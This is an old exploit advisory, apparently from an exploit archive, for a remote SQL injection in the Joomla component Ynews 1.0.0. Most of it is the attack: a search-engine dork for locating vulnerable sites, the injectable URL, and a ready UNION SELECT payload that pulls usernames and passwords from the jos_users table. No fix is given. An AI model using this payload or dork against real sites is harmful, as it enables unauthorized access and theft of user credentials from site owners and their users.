Joomla Component Ynews 1.0.0 (id) Remote SQL Injection Vulnerability

2008-02-06 00:00:00

###########################################################################################
### Title : Joomla Component Ynews 1.0.0 (id) Remote SQL Injection Vulnerability
###
### Author : By Crackers_Child [email protected]
###
### Greetz : Str0ke,www.biyofrm.com & www.sibersavascilar.com & www.tryag.cc
###
### Dork : inurl:index.php?option=com_ynews
###
### Exploit : /index.php?option=com_ynews&Itemid=0&task=showYNews&id=SQL
###
### SQL : -1/**/union/**/select/**/0,1,2,username,password,5,6%20from%20jos_users/*
###
### Note : Kac Kere ölDunuz ki " Olum Den Korkmuyorum Ben " Diyebiliyorsunuz . . .
###########################################################################################

#

Fixes

No fixes

In order to submit a new fix you need to be registered.